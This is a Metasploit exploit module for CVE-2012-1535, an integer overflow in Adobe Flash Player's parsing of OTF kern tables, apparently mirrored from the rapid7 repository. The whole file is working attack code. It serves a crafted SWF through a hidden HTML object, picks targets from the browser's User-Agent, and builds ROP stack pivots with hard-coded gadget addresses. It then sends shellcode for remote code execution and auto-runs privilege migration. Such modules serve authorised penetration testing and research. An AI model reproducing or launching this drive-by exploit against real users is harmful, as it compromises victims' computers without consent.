Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flash_otf_font.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::RopDb

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow",

17
        'Description' => %q{

18
          This module exploits a vulnerability found in the ActiveX component of Adobe

19
          Flash Player before 11.3.300.271. By supplying a specially crafted .otf font file

20
          with a large nTables value in the 'kern' header, it is possible to trigger an

21
          integer overflow, which results in remote code execution under the context of the

22
          user.  This vulnerability has also been exploited in the wild in limited targeted

23
          attacks.  Please note in order to ensure reliability, the exploit is forced to

24
          modify your URIPATH parameter to less than 3 characters, which may cause possible

25
          URIPATH collisions.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Alexander Gavrun', # Through iDefense

30
          'sinn3r',

31
          'juan vazquez'

32
        ],

33
        'References' => [

34
          [ 'CVE', '2012-1535' ],

35
          [ 'OSVDB', '84607'],

36
          [ 'BID', '55009'],

37
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/' ],

38
          [ 'URL', 'https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html' ],

39
          [ 'URL', 'http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html' ],

40
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit' ],

41
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-18.html']

42
        ],

43
        'Payload' => {

44
          'Space' => 1024

45
        },

46
        'DefaultOptions' => {

47
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

48
        },

49
        'Platform' => 'win',

50
        'Targets' => [

51
          # Tested successfully on:

52
          # Flash 11.2.202.233

53
          # Flash 11.3.300.268

54
          # Flash 11.3.300.265

55
          # Flash 11.3.300.257

56
          [ 'Automatic', {} ],

57
          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil } ],

58
          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil } ],

59
          [ 'IE 8 on Windows XP SP3', { 'Rop' => true, 'ASLR' => false } ],

60
          [ 'IE 7 on Windows Vista SP2', { 'Rop' => nil }],

61
          [ 'IE 8 on Windows 7 SP1', { 'Rop' => true, 'ASLR' => true } ],

62
          [ 'IE 9 on Windows 7 SP1', { 'Rop' => true, 'ASLR' => true } ]

63
        ],

64
        'Privileged' => false,

65
        'DisclosureDate' => '2012-08-09',

66
        'DefaultTarget' => 0,

67
        'Notes' => {

68
          'Reliability' => UNKNOWN_RELIABILITY,

69
          'Stability' => UNKNOWN_STABILITY,

70
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

71
        }

72
      )

73
    )

74


75
    register_options(

76
      [

77
        OptEnum.new('ROP', [true, "The ROP chain to use", 'SWF', %w(SWF JRE)]),

78
      ]

79
    )

80
  end

81


82
  def get_payload(t, flash_version = nil)

83
    if t['Rop'].nil?

84
      p = [

85
        0x0c0c0c0c, # mapped at 1e0d0000

86
        0x0c0c0c0c,

87
        0x0c0c0c0c, # mapped at 1e0d0008

88
      ].pack("V*")

89


90
      p << payload.encoded

91
      return p

92
    end

93


94
    if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/

95
      print_status("Using Rop Chain For Flash: #{flash_version}")

96
      pivot = [

97
        0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)

98
        0x0c0c0c0c,

99
        0x1001d891, # xchg eax, esp # ret (1e0d0008)

100
      ].pack("V*")

101


102
      p = generate_rop_payload('flash', payload.encoded, { 'target' => '11.3.300.257', 'pivot' => pivot })

103


104
    elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/

105
      print_status("Using Rop Chain For Flash: #{flash_version}")

106
      pivot = [

107
        0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)

108
        0x0c0c0c0c,

109
        0x1001d6d3, # xchg eax, esp # ret (1e0d0008)

110
      ].pack("V*")

111


112
      p = generate_rop_payload('flash', payload.encoded, { 'target' => '11.3.300.265', 'pivot' => pivot })

113


114
    elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/

115
      print_status("Using Rop Chain For Flash: #{flash_version}")

116
      pivot = [

117
        0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)

118
        0x0c0c0c0c,

119
        0x1001d755, # xchg eax, esp # ret (1e0d0008)

120
      ].pack("V*")

121


122
      p = generate_rop_payload('flash', payload.encoded, { 'target' => '11.3.300.268', 'pivot' => pivot })

123


124
    else

125
      print_status("Default back to JRE ROP")

126
      pivot = [

127
        0x7c34a028, # POP EDI # POP ESI # RETN (1e0d0000)

128
        0x0c0c0c0c,

129
        0x7c348b05, # xchg eax, esp # ret (1e0d0008)

130
      ].pack("V*")

131


132
      p = generate_rop_payload('java', payload.encoded, { 'pivot' => pivot })

133
    end

134


135
    return p

136
  end

137


138
  def get_target(agent)

139
    # If the user is already specified by the user, we'll just use that

140
    return target if target.name != 'Automatic'

141


142
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/

143
      return targets[1]  # IE 6 on Windows XP SP3

144
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/

145
      return targets[2]  # IE 7 on Windows XP SP3

146
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/

147
      return targets[3]  # IE 8 on Windows XP SP3

148
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/

149
      return targets[4]  # IE 7 on Windows Vista SP2

150
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/

151
      return targets[5]  # IE 8 on Windows 7 SP1

152
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/

153
      return targets[6]  # IE 9 on Windows 7 SP1

154
    else

155
      return nil

156
    end

157
  end

158


159
  def on_request_uri(cli, request)

160
    agent = request.headers['User-Agent']

161
    my_target = get_target(agent)

162


163
    # Avoid the attack if the victim doesn't have the same setup we're targeting

164
    if my_target.nil?

165
      print_error("Browser not supported: #{agent}")

166
      send_not_found(cli)

167
      return

168
    end

169


170
    print_status("Target selected: #{my_target.name}")

171
    print_status("Client requesting: #{request.uri}")

172


173
    # The SWF request itself

174
    if request.uri =~ /\.swf$/

175
      print_status("Sending SWF")

176
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })

177
      return

178
    end

179


180
    # The TXT payload request

181
    if request.uri =~ /\.txt$/

182
      flash_version = request.headers['x-flash-version']

183
      shellcode = get_payload(my_target, flash_version).unpack('H*')[0]

184
      print_status("Sending Payload")

185
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })

186
      return

187
    end

188


189
    # swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"

190
    swf_uri = "/#{@resource_name}.txt.swf"

191


192
    html = %Q|

193
    <html>

194
    <head>

195
    </head>

196
    <body>

197
    <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">

198
    <param name="movie" value="#{swf_uri}">

199
    <param name="FlashVars" value="s=#{@resource_name}">

200
    </object>

201
    </body>

202
    </html>

203
    |

204


205
    html = html.gsub(/^ {4}/, '')

206


207
    print_status("Sending HTML")

208
    send_response(cli, html, { 'Content-Type' => 'text/html' })

209
  end

210


211
  def primer

212
    # we need to handle direct /pay.txt requests

213
    hardcoded_uripath("/#{@resource_name}.txt")

214
  end

215


216
  def exploit

217
    @swf = create_swf

218
    @resource_name = Rex::Text.rand_text_alpha(5)

219
    vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")

220


221
    datastore['URIPATH'] = datastore['URIPATH'] || random_uri

222
    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//

223
    datastore['URIPATH'] = datastore['URIPATH'][0, 3] if datastore['URIPATH'].length > 3

224
    print_warning("URIPATH set to #{datastore['URIPATH']}")

225


226
    super

227
  end

228


229
  def create_swf

230
    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2012-1535", "Main.swf")

231
    fd = ::File.open(path, "rb")

232
    swf = fd.read(fd.stat.size)

233
    fd.close

234
    return swf

235
  end

236
end

237


238